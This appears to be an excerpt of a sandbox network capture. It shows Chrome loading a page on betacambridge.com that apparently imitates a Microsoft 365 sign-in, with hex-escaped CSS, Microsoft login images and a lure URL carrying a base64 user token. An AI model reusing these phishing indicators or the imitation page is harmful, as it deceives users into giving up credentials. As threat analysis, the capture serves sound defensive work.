                                            2024-11-18 20:15:49 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30 32 35 35 2c 5c 78 32 30 32 35 35 29 2c 5c 78 32 30 72 67 62 28 35 39 2c 5c 78 32 30 35 39 2c 5c 78 32 30 35 39 29 29 3b 5c 78 30 61 5c 78 32 30 5c 78
                                            Data Ascii: 20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20255,\x20255),\x20rgb(59,\x2059,\x2059));\x0a\x20\x
                                            2024-11-18 20:15:49 UTC8000INData Raw: 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32
                                            Data Ascii: 0.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x2
                                            2024-11-18 20:15:49 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 2d 31 32 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                            Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20left:\x20-12px;\x0a\x20\x20\x20\x20\x
                                            2024-11-18 20:15:49 UTC8000INData Raw: 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 6c 61 62 65 6c 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78
                                            Data Ascii: 43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x20label\x20{\x0a\x20\x
                                            2024-11-18 20:15:49 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e
                                            Data Ascii: \x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20poin
                                            2024-11-18 20:15:49 UTC8000INData Raw: 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                            Data Ascii: gsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.44974913.107.246.454432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:49 UTC654OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                            Host: aadcdn.msauth.net
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://betacambridge.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:49 UTC784INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:49 GMT
                                            Content-Type: image/svg+xml
                                            Content-Length: 673
                                            Connection: close
                                            Cache-Control: public, max-age=31536000
                                            Content-Encoding: gzip
                                            Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                            ETag: 0x8DB5C3F47E260FD
                                            x-ms-request-id: aa545bca-a01e-0037-67eb-386645000000
                                            x-ms-version: 2009-09-19
                                            x-ms-lease-status: unlocked
                                            x-ms-blob-type: BlockBlob
                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                            Access-Control-Allow-Origin: *
                                            x-azure-ref: 20241118T201549Z-1866b5c5fbbwlv6nhC1DFWw4bs00000004t000000000b66t
                                            x-fd-int-roxy-purgeid: 4554691
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:15:49 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                            Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.44974713.107.246.454432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:49 UTC655OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                            Host: aadcdn.msauth.net
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://betacambridge.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:49 UTC806INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:49 GMT
                                            Content-Type: image/svg+xml
                                            Content-Length: 1435
                                            Connection: close
                                            Cache-Control: public, max-age=31536000
                                            Content-Encoding: gzip
                                            Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                            ETag: 0x8DB5C3F4911527F
                                            x-ms-request-id: 4de04481-601e-0065-6362-361aad000000
                                            x-ms-version: 2009-09-19
                                            x-ms-lease-status: unlocked
                                            x-ms-blob-type: BlockBlob
                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                            Access-Control-Allow-Origin: *
                                            x-azure-ref: 20241118T201549Z-16547b76f7fljddfhC1DFWeqbs000000071g00000000tbxh
                                            x-fd-int-roxy-purgeid: 4554691
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:15:49 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                            Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.44974813.107.246.454432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:49 UTC675OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                            Host: aadcdn.msauth.net
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://betacambridge.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:49 UTC806INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:49 GMT
                                            Content-Type: image/svg+xml
                                            Content-Length: 2407
                                            Connection: close
                                            Cache-Control: public, max-age=31536000
                                            Content-Encoding: gzip
                                            Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                            ETag: 0x8DB5C3F499A9B99
                                            x-ms-request-id: 6158e1f5-201e-0006-7d33-388756000000
                                            x-ms-version: 2009-09-19
                                            x-ms-lease-status: unlocked
                                            x-ms-blob-type: BlockBlob
                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                            Access-Control-Allow-Origin: *
                                            x-azure-ref: 20241118T201549Z-16547b76f7f5b5tthC1DFWuk8400000004wg00000000g9g7
                                            x-fd-int-roxy-purgeid: 4554691
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:15:49 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                            Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.449753192.232.223.484432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:49 UTC671OUTGET /favicon.ico HTTP/1.1
                                            Host: betacambridge.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:50 UTC394INHTTP/1.1 302 Found
                                            Date: Mon, 18 Nov 2024 20:15:49 GMT
                                            Server: Apache
                                            Link: <https://www.betacambridge.com/wp-json/>; rel="https://api.w.org/"
                                            X-Redirect-By: WordPress
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Location: https://www.betacambridge.com/wp-content/uploads/2020/06/cropped-Beta-cambridge-school-logo-1-32x32.png
                                            Content-Length: 0
                                            Content-Type: text/html; charset=UTF-8


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.449744184.28.90.27443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:49 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                            Range: bytes=0-2147483646
                                            User-Agent: Microsoft BITS/7.8
                                            Host: fs.microsoft.com
                                            2024-11-18 20:15:49 UTC515INHTTP/1.1 200 OK
                                            ApiVersion: Distribute 1.1
                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                            Content-Type: application/octet-stream
                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                            Server: ECAcc (lpl/EF06)
                                            X-CID: 11
                                            X-Ms-ApiVersion: Distribute 1.2
                                            X-Ms-Region: prod-weu-z1
                                            Cache-Control: public, max-age=160136
                                            Date: Mon, 18 Nov 2024 20:15:49 GMT
                                            Content-Length: 55
                                            Connection: close
                                            X-CID: 2
                                            2024-11-18 20:15:49 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.44974518.245.31.784432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:49 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                            Host: cdn.socket.io
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:49 UTC702INHTTP/1.1 200 OK
                                            Content-Type: application/javascript; charset=utf-8
                                            Content-Length: 49993
                                            Connection: close
                                            Accept-Ranges: bytes
                                            Access-Control-Allow-Origin: *
                                            Cache-Control: public, max-age=31536000, immutable
                                            Content-Disposition: inline; filename="socket.io.min.js"
                                            Date: Sat, 03 Aug 2024 07:26:50 GMT
                                            ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                            Server: Vercel
                                            Strict-Transport-Security: max-age=63072000
                                            X-Vercel-Cache: HIT
                                            X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                            X-Cache: Hit from cloudfront
                                            Via: 1.1 b0723c68cc136f4e89ad2f6a85c82e12.cloudfront.net (CloudFront)
                                            X-Amz-Cf-Pop: FRA56-P8
                                            X-Amz-Cf-Id: iGiVen8r9UIfcFKvQzNE_Evojfkp15d0lxQO-bNbceTFoehqQ43APg==
                                            Age: 9668340
                                            2024-11-18 20:15:50 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                            Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                            2024-11-18 20:15:50 UTC16384INData Raw: 66 20 64 6f 63 75 6d 65 6e 74 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 74 74 61 63 68 45 76 65 6e 74 29 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 61 65 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 70 61 67 65 68 69 64 65 22 69 6e 20 49 3f 22 70 61 67 65 68 69 64 65 22 3a 22 75 6e 6c 6f 61 64 22 2c 61 65 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 61 65 28 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 73 65 2e 72 65 71 75 65 73 74 73 29 73 65 2e 72 65 71 75 65 73 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 73 65 2e 72 65 71 75
                                            Data Ascii: f document)if("function"==typeof attachEvent)attachEvent("onunload",ae);else if("function"==typeof addEventListener){addEventListener("onpagehide"in I?"pagehide":"unload",ae,!1)}function ae(){for(var e in se.requests)se.requests.hasOwnProperty(e)&&se.requ
                                            2024-11-18 20:15:50 UTC15202INData Raw: 74 61 20 77 68 65 6e 20 72 65 63 6f 6e 73 74 72 75 63 74 69 6e 67 20 61 20 70 61 63 6b 65 74 22 29 3b 76 61 72 20 6e 3d 28 74 3d 74 68 69 73 2e 64 65 63 6f 64 65 53 74 72 69 6e 67 28 65 29 29 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 3b 6e 7c 7c 74 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 3f 28 74 2e 74 79 70 65 3d 6e 3f 42 65 2e 45 56 45 4e 54 3a 42 65 2e 41 43 4b 2c 74 68 69 73 2e 72 65 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 65 77 20 50 65 28 74 29 2c 30 3d 3d 3d 74 2e 61 74 74 61 63 68 6d 65 6e 74 73 26 26 70 28 73 28 69 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 65 6d 69 74 52 65 73 65 72 76 65 64 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 22 64 65 63 6f 64 65 64 22 2c 74 29 29 3a 70 28 73 28 69
                                            Data Ascii: ta when reconstructing a packet");var n=(t=this.decodeString(e)).type===Be.BINARY_EVENT;n||t.type===Be.BINARY_ACK?(t.type=n?Be.EVENT:Be.ACK,this.reconstructor=new Pe(t),0===t.attachments&&p(s(i.prototype),"emitReserved",this).call(this,"decoded",t)):p(s(i
